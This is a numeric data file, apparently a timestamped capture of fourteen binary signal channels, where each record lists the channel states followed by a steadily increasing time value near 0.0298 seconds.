0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812988e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813012e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813036e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9813040e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9813084e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9813108e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813116e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813136e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813160e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813188e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813212e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813236e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813260e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813284e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813308e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9813316e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9813364e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9813388e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9813392e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813396e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813412e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813436e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813484e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9813492e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9813536e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9813560e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813568e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813612e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813636e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813660e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813684e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813708e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813736e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813760e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813788e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813812e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813836e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813860e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813884e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813908e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813936e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9813960e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9813988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814012e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814036e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814060e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.9814064e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9814068e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9814112e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9814136e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9814140e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814144e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814160e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9814188e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9814236e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9814260e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814268e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814284e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814308e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814336e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814360e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814388e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814412e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814436e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814460e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.9814464e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9814468e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9814512e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9814536e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9814540e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814544e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814560e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814588e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814612e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814636e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814660e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814684e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814708e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814736e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814760e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814788e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814812e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814836e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814860e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814884e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814908e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814936e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9814960e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9814988e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815012e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815036e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815060e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815084e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815092e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9815136e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815160e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815168e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815188e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815212e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815236e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815260e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815284e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815308e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815336e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815360e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815364e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9815388e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815412e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9815436e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815468e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815512e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815536e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815612e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815636e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815660e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815684e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815708e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815736e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815760e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815764e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9815812e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9815836e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815844e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815860e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815884e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815908e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815936e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9815960e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9815988e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816012e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816036e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816060e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816084e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816108e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816136e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816160e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816188e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816212e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816236e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816260e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816284e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816308e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816336e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816360e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816388e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816412e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816436e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816484e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9816492e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9816508e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9816536e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9816560e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9816588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816592e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816636e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816660e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816708e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816736e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816760e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816788e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816812e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816836e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9816840e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9816884e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9816908e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816916e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816936e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9816960e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9816988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817012e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817036e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817060e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817084e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817108e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9817116e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9817160e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9817188e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9817192e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817196e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817212e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817236e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817260e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817284e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817308e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817336e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817360e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817388e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817412e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817436e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817484e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817508e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817536e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817560e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817588e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817612e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817636e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817660e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817684e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817708e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817736e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817760e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817788e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817812e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817836e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817860e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817884e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817908e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817936e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9817956e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9817988e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818012e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818036e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818060e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818084e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818108e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818136e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818156e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818188e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818212e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818236e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818260e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818284e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818308e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818336e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818356e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818388e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818412e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818436e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818460e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818484e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818508e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818536e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818560e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818588e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818612e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818636e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818660e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818684e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9818708e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9818736e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9818740e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.9943296e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.9943532e-02 1,1,0,0,1,1,0,0,0,1,0,1,0,1,2.9943556e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,2.9943584e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,1,2.9943904e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,1,2.9943932e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9943936e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9943956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9943980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9944004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9944028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9944056e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9944080e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9944108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944132e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944156e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944180e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944256e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944280e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944380e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9944388e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9944432e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9944456e-02 1,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9944460e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944464e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944480e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944508e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944532e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944556e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944604e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9944612e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9944656e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9944684e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944688e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944708e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944732e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944756e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944780e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944804e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944828e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944856e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944880e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944932e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9944956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9944980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945004e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9945012e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9945056e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9945080e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945088e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945132e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945156e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945180e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945256e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945280e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9945284e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9945332e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9945356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945364e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945456e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9945460e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9945504e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9945532e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945536e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945580e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945604e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945628e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945656e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945680e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945732e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945756e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945804e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945856e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945876e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945904e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945932e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9945956e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9945980e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946004e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946028e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946056e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946076e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9946084e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9946132e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9946156e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946164e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946204e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9946208e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9946256e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9946276e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946288e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946304e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946332e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946356e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946380e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946404e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946428e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946456e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946476e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9946484e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9946532e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9946556e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946564e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946580e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946604e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946628e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946656e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946676e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946704e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946728e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946756e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946780e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946804e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946828e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946856e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946876e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946904e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946928e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9946956e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9946980e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947004e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947028e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947056e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947076e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947104e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947108e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9947156e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947180e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947204e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947228e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947256e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947276e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947304e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947328e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947380e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947404e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947428e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947452e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9947476e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9947504e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9947508e-02 1,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9947528e-02 